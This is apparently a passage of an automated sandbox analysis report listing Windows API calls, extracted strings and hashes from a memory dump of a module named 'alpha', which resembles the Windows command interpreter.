                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: DriveType
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 338552980-336475711
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.KERNELBASE ref: 00007FF706EC5B52
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF706EC4297
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF706EC42D7
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: memset.MSVCRT ref: 00007FF706EC42FD
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: memset.MSVCRT ref: 00007FF706EC4368
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF706EC4380
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: wcsrchr.MSVCRT ref: 00007FF706EC43E6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: lstrcmpW.KERNELBASE ref: 00007FF706EC4401
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF706EC5BC7
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 497088868-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1412018758-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: exit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2483651598-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: DefaultUser
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3358694519-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1388555566-2647954630
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: &<|>$+: $:$:EOF$=,;$^
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmp$wcschr$wcstol
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED7F44
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706ED7F5C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED7F9E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED7FFF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED8020
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED8036
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED8061
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706ED8075
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED80D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706ED80EA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF706ED8177
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF706ED819A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF706ED81BD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF706ED81DC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF706ED81FB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF706ED821A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF706ED8239
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED8291
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED82D7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED82FB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED831A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED8364
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706ED8378
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED839A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED83AE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED83E6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED8403
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED8418
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3637805771-3100821235
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a79151f21cbb2f5de0ef962a0dff172dd51a2f8a2461997091fc7497a27c9542
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6E18335A08B52CAE710AF65EC2417BF6A1FF49B98B849235CE1E53794DF3CA449C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s$%s
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3623545644-3518022669
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cd1d635d304d9b8fc47bbf17458a3d922035ebb172f74a43403d1b86dd740a60
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02D2A232A087828AEB64AF259C602BBB7A1FF44758F945135DB0E47AD9DF3CE544C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %9d$%s
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4286035211-3662383364
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 598ba86598e47181d3827c03e7975ff333ef8375984d9101bf580af6950dfbe2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A52A336A08B828AEB64AF24EC602FBB7A1FF85798F845135DA0E47794DF3CD5458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcsrchr$towlower
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: fdpnxsatz
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3267374428-1106894203
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
• String ID: DPATH
• API String ID: 95024817-2010427443
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID:
• String ID: [...]$ [..]$ [.]$...$:
• API String ID: 0-1980097535
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
• String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
• API String ID: 1795611712-3662956551
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 00007FF706EDEF33
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDEF98
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDEFA9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDEFBF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF706EDEFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDEFED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF003
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF022
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF083
                                                                                                                                                                                                                                                                                                                                                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF092
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF0A5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF706EDF0DB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF135
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF16C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF185
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC01B8: _get_osfhandle.MSVCRT ref: 00007FF706EC01C4
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC01D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
